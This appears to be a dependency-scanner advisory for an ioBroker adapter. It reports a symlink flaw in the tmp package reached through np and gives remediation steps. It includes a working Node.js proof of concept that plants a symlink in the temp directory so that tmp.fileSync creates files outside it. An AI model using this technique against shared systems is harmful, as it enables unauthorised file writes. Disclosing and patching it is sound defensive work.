Vulnerabilities: 1 via 2 paths
Dependencies: 295
Source: GitHub
Commit: a3c526bb

medium severity

Symlink Attack

  • Vulnerable module: tmp
  • Introduced through: np@10.2.0

Detailed paths

  • Introduced through: iobroker.vis-icontwo@inventwo/iobroker.vis-icontwo#a3c526bb5db6e821338f565e03f58bfc23e9ce4c > np@10.2.0 > listr-input@0.2.1 > inquirer@7.3.3 > external-editor@3.1.0 > tmp@0.0.33
  • Introduced through: iobroker.vis-icontwo@inventwo/iobroker.vis-icontwo#a3c526bb5db6e821338f565e03f58bfc23e9ce4c > np@10.2.0 > listr-input@0.2.1 > inquirer-autosubmit-prompt@0.2.0 > inquirer@6.5.2 > external-editor@3.1.0 > tmp@0.0.33

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. The caller-supplied dir is checked only lexically: the library verifies that the path it resolves to lies under the system temporary directory, but it does not resolve symbolic links first. A symlink placed inside the temporary directory that points elsewhere therefore passes the check, and the temporary file or directory is created at the link's target. An attacker who can plant such a link (typically a local user on a shared /tmp) can thereby cause files or directories to be written to arbitrary locations outside the intended temporary directory. The PoC below shows the asymmetry: a missing subdirectory and an absolute path outside the temp dir are both rejected, and so is the symlink's real target when passed directly, yet the same target is reached through the link.

PoC

const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');
const tmp = require('tmp');

// Setup for the PoC: a writable directory outside the system temp dir, and a
// symlink inside the temp dir that points at it. The target location is an
// assumption for the demo; the advisory only requires that the link resolve
// outside the temporary directory.
const target = fs.mkdtempSync(path.join(os.homedir(), 'evil-target-'));
const link = path.join(os.tmpdir(), 'evil-dir');
if (!fs.existsSync(link)) fs.symlinkSync(target, link, 'dir');

// A relative dir name is accepted: the library joins it to the temp dir and
// creates the file through the symlink, i.e. inside `target`.
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
console.log('Actually created at: ', fs.realpathSync(tmpobj.name));

// test 1: a directory that does not exist under the temp dir is rejected.
try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

// test 2: an absolute path outside the temp dir is rejected outright.
try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

// test 3: the symlink's real target, passed directly, is rejected too. The
// same directory was written to above because the check looked at the path
// as written, not at where the link leads.
try {
    const resolved = fs.realpathSync(link);
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher. tmp is not a direct dependency here: both paths reach it through np@10.2.0 (via listr-input, inquirer and external-editor), so either move to an np release whose dependency tree pulls in tmp@0.2.4 or newer, or force the version with an overrides entry for tmp in package.json (npm 8.3 or later). Afterwards confirm with npm ls tmp that no path still resolves to 0.0.33.
